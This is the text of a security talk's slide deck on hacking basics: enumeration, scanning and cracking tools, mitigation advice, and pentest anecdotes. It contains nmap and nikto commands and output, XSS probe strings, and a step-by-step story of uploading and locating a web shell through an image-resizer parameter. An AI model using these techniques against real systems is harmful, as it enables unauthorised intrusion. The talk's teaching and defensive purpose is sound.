hacking
Some odds, ends and anecotes
WHo am I
No-one of consequence
15 years as a dev
Banking, insurance, VOIP, crypto,
games, simulation, F-111 control,
mission planning, accounting,
high volume websites, and more
Switched this year to infosec
Agenda
The basics of Hacking
Tools of the Trade
Mitigation
Stories from the front line
The basics
What is it?
Enumeration
Enumeration
Enumeration
Information gathering
OS + version
Web Server + version + modules
Application + version + plugins
Application layout/structure
Application logic
URI mappings
Authentication mechanism
API endpoints
Transport level security measures
What does it give you?
Weak points
Increased chance of successful attack
Targeted research
Known flaws / vulns
Attacking
95% Enumeration
5% execution
Often known flaws
Custom exploits
Most common:
LFI/RFI
Poor Auth
SQLi
ATTACKERS
Know way more than you think
Can find out way more than you think
Are more creative than you think
Will find a way in if they want it bad enough
Without it
Bad guys have almost nothing
Blind attacks are possible but hard
They'll give up earlier
Everything is insecure
Be a less appealing target
Don't store sensitive user info
Don't leak infra info
Patch regularly
Security is ongoing, not once-off
TOOLS!
Nmap
The scanner of scanners
Fingerprints OS
Open ports
Some vulns
NMAP OUTPUT
sudo nmap -A -O 10.5.26.52
Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-31 15:19 EST
Nmap scan report for WIN-P73NLAJOYFH.fritz.box (10.5.26.52)
Host is up (0.00062s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open netbios-ssn
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
|_http-title: Service Unavailable
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:49:AE:13 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows NMAP OUTPUT
Host script results:
|_nbstat: NetBIOS name: WIN-P73NLAJOYFH, NetBIOS user: , NetBIOS MAC: 00:0c:29:49:ae:13 (VMware)
| smb-os-discovery:
| OS: Windows Vista (TM) Ultimate 6002 Service Pack 2 (Windows Vista (TM) Ultimate 6.0)
| OS CPE: cpe:/o:microsoft:windows_vista::sp2
| Computer name: WIN-P73NLAJOYFH
| NetBIOS computer name: WIN-P73NLAJOYFH
| Workgroup: WORKGROUP
|_ System time: 2013-10-31T16:20:48+11:00
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms WIN-P73NLAJOYFH.fritz.box (10.5.26.52)
NMAP OUTPUT
Probe for SMB vulns on Vista SP2
nmap -p 445 10.5.26.52 --script=smb-check-vulns --script-args=unsafe=1 CRASHES!
NMAP OUTPUT
Probe for SMB vulns on XP Home
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE <-- OOOOH!
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Nmap done: 1 IP address (1 host up) scanned in 5.12 seconds Instant SYSTEM shell
Still a REALLY common OS
NMAP ALSO GETS
Servers
-
HTTP
-
Telnet
-
FTP
-
SSH
-
..and many more
SQLMAP
DB ownage via SQLi
Automates the lot
Dumps:
-
Data
-
Schema
-
Accounts
-
Passwords!
Nikto.pl
Perl script for application scanning
-
Common web application problems
-
Unprotected folders
- Misconfiguration
- Information disclosure
- Known vulnerabilities
NIKTO.PL OUTPUT
$ ./nikto.pl -h http://SUPERSECRET -Display 124
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: XX.XX.XX.XX
+ Target Hostname: SUPERSECRET
+ Target Port: 80
+ Start Time: 2013-10-31 15:35:01 (GMT10)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /securecontrolpanel/ - Redirects (301) to https://ANOTHERSITE:2083 , Web Server Control Panel
+ /webmail/ - Redirects (301) to http://SUPERSECRET:2095 , Web based mail package installed.
+ /mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT> - Redirects (301) to http://ANOTHERSITE/mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT> , Mailman 2.1 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /mailman/listinfo/ - Redirects (301) to http://ANOTHERSITE/mailman/listinfo/%3cscript%3ealert('Vulnerable')%3c/script%3e , Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /mailman/admin/ml-name?\">; - Redirects (301) to http://ANOTHERSITE/mailman/admin/ml-name?\">; , Mailman is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /mailman/listinfo - Redirects (301) to http://ANOTHERSITE/mailman/listinfo , Mailman was found on the server.
+ /cpanel/ - Redirects (301) to http://SUPERSECRET:2082 , Web-based control panel
+ /cgi-sys/cgiecho - Redirects (302) to http://SOMEOTHERSITE/wwwdev/cgiemail/nopath.html , Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ /cgi-sys/cgiemail - Redirects (302) to http://SOMEOTHERSITE/wwwdev/cgiemail/nopath.html , Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ /cgi-sys/domainredirect.cgi - Redirects (302) to http://ANOTHERSITE/domainnotknown.html , Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
+ OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ /css - Redirects (301) to http://SUPERSECRET/css/ , This might be interesting...
+ /download/ - Redirects (302) to /?error=You%20submitted%20an%20empty%20url , This might be interesting...
+ OSVDB-3092: /home/: This might be interesting...
+ /js - Redirects (301) to http://SUPERSECRET/js/ , This might be interesting...
+ OSVDB-3092: /scr/: This might be interesting. DIRBUSTER
Dir brute forcer
Surprisingly handy!
Uncovers folders that are otherwise hidden
AKA entry points
HYDRA
Account brute-forcer
-
SSH
-
FTP
-
TELNET
-
IMAP/POP
-
SMTP
DO. NOT. REUSE. PASSWORDS. PERIOD.
HASHCAT
GPU Password cracking
AMAZINGLY fast
MD5 | md5($pass.$salt) | md5($salt.$pass) | md5(unicode($pass).$salt) | md5($salt.unicode($pass)) | SHA1 | sha1($pass.$salt) | sha1($salt.$pass) | sha1(unicode($pass).$salt) | sha1($salt.unicode($pass)) | MySQL | phpass, MD5(Wordpress), MD5(phpBB3) | md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5 | MD4 | NTLM | Domain Cached Credentials, mscash | SHA256 | sha256($pass.$salt) | sha256($salt.$pass) | sha256(unicode($pass).$salt) | sha256($salt.unicode($pass)) | descrypt, DES(Unix), Traditional DES | md5apr1, MD5(APR), Apache MD5 | SHA512 | sha512($pass.$salt) | sha512($salt.$pass) | sha512(unicode($pass).$salt) | sha512($salt.unicode($pass)) | sha512crypt, SHA512(Unix) | Domain Cached Credentials2, mscash2 | Cisco-PIX MD5 | WPA/WPA2 | Double MD5 | LM | Oracle 7-10g, DES(Oracle) | bcrypt, Blowfish(OpenBSD) | SHA-3(Keccak) | Half MD5 (left, mid, right) | Password Safe SHA-256 | IKE-PSK MD5 | IKE-PSK SHA1 | NetNTLMv1-VANILLA / NetNTLMv1+ESS | NetNTLMv2 | Cisco-IOS SHA256 | Samsung Android Password/PIN | RipeMD160 | Whirlpool | TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 + AES | TrueCrypt 5.0+ PBKDF2 HMAC-SHA512 + AES | TrueCrypt 5.0+ PBKDF2 HMAC-Whirlpool + AES | TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 boot-mode + AES | AIX {smd5} | AIX {ssha256} | AIX {ssha512} | 1Password | AIX {ssha1} | Lastpass | GOST R 34.11-94 | OSX v10.8 | GRUB 2 | sha256crypt, SHA256(Unix) | Joomla | osCommerce, xt:Commerce | nsldap, SHA-1(Base64), Netscape LDAP SHA | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA | Oracle 11g | SMF > v1.1 | OSX v10.4, v10.5, v10.6 | MSSQL(2000) | MSSQL(2005) | EPiServer 6.x < v4 | EPiServer 6.x > v4 | SSHA-512(Base64), LDAP {SSHA512} | OSX v10.7 | vBulletin < v3.8.5 | vBulletin > v3.8.5 | IPB2+, MyBB1.2+ BURP
Similar to ZAP, but more awesome
Proxy, intruder, spider, scanner,
repeater, sequencer, decoder, comparer ...
Perfect MITM tool
The web app attacker's best friend
Chrome & Firefox
But not IE ;)
Chrome dev tools
Firebug
Insane visibility out of the box
Don't use hackbar, it's crap
METASPLOIT
The pentester's go-to tool
Hundreds of exploits, hundreds of post-exploits
Priv esc, pivots, persistence, automatic ownage,
info gathering, desktop automation, computer lockout,
credential snarfing, pash-the-hash,
DNS/NETBIOS/LLMNR spoofing
and WAY more
meterpreter
The preferred shell for use with Metasploit
Makes post-exploitation on Windows a dream
Fear this thing
Disclaimer: I work on this
Metasploit & Meterpreter
DEMO!
ALL THESE TOOLS
Are free ...
... many are open source ...
... all of them easy to use
in case it's not clear
DO. NOT. REUSE. PASSWORDS. PERIOD.
Don't store sensitive data
Don't encrypt; hash
DO. NOT. REUSE. PASSWORDS. PERIOD.
You are already behind in the game of cat and mouse
Mitigation
Remove server headers
Remove framework versions
Hide apps (eg. Nginx)
Use HTTPS
Parameterised queries
MITIGATION
Avoid NIH
Log your stuff
WATCH your logs
Firewall OUTBOUND as well as inbound
Turn off EVERYTHING you don't need
MITIGATION
DO NOT trust user input
DO NOT trust database "input"
Don't run commands in your app
Don't use blacklists
Don't sanitize, reject!
MITIGATION
Patch your servers
Patch your frameworks
Monitor your users
Don't store sensitive data
If you must store it, don't roll your own crypto
MITIGATION
If you can, use third-parties for auth
(eg. Facebook, Google, Twitter)
Use whatever tools you can to mitigate the common
issues including XSS, CSRF, DOR, etc
Stand on the shoulders of giants
Be critical of your own work
and get it reviewed
FRONT LINE STORY 1
PHP Web Application
First ever pentest
SQLi on front page
XSS everywhere
Profile image upload feature
RCE in 12 mins!
FRONT LINE STORY 2
Bounty for charity
No reward, goal was to help out
Built on a commercial CMS
Still had a very interesting hole
FRONT LINE STORY 2
Server disclosed IIS 7.5
Windows box, probably running ASP.NET
http://domain/index.aspx
Definitely running ASP.NET
Already narrowed down possible attack vectors
FRONT LINE STORY 2
Commercial CMS out of scope
custom code in scope
Typical brochure site
not much functionality
ASP.NET 2.0, no XSS, CSRF or SQLi
However....
FRONT LINE STORY 2
http://domain.com/Thumbnailer.ashx
?file=image.jpg&w=200&h=200
Not part of the core CMS
Obvious custom code
Appeared to do image resizing on the fly
FRONT LINE STORY 2
Questions:
What would I do if I were to write this?
Would I cache images?
Would I resize each time?
What .NET functions would I use?
How would I handle missing files?
FRONT LINE STORY 2
http://domain/Thumbnailer.ashx?file=SCHMOOPY.png
File doesn't exist
Crash
Stack trace
Information disclosure
FRONT LINE STORY 2
Now we know:
- Images need to be on disk
- Images are most likely cached
- Stack traces can be helpful
FRONT LINE STORY 2
http://domain/Thumbnailer.ashx
?file=http://site/foo.png
It renders!
But... the file needs to be on disk?
What does this mean?
We can upload files
FRONT LINE STORY 2
http://domain.com/Thumbnailer.ashx?
file=http://site/bar.txt
Crashes in the image manipulation function
No file type sanitisation
What other extensions might be interesting?
FRONT LINE STORY 2
http://domain.com/Thumbnailer.ashx?
file=http://site/shell.aspx
Same crash
We just uploaded our own shell
But where is it?
FRONT LINE STORY 2
How do we find out where the files
are cached?
What do we know about the
target OS that can help?
"con"
FRONT LINE STORY 2
http://domain/Thumbnailer.ashx?
file=/foo/con
Crash
Stack trace
Can't stat file /imagecache/-4372839843.io/con
We've found the cache
FRONT LINE STORY 2
More playing with `file`
Files stored as
/imagecache/<hash>.extension
Our shell is located at
/imagecache/<hash>.aspx
But what's the hash?
FRONT LINE STORY 2
.NET has a function..
.GetHashCode()
We generate the hash for our file
We now know the location of the shell
http://domain/imagecache/28949548.aspx
Owned
FRONT LINE STORY 2
Priv esc was out of scope :(
Lessons?
-
Don't disclose info.
-
Turn off debug errors.
-
Sanitise file extensions.
-
Don't allow external files.
- Do not trust your users.
CLOSING THOUGHTS
Security can't be bolted on.
It's a process, not a patch.
Include it in your sprints and reviews.
Take it seriously, or it'll own you.
QUESTIONS?
thank you
OJ Reeves
@TheColonial
http://buffered.io/
oj@buffered.io
Ping me!
Hacking - some odds, ends and anecdotes
By OJ
Hacking - some odds, ends and anecdotes
Basics of hacking, tools, mitigations and stories.
- 1,403
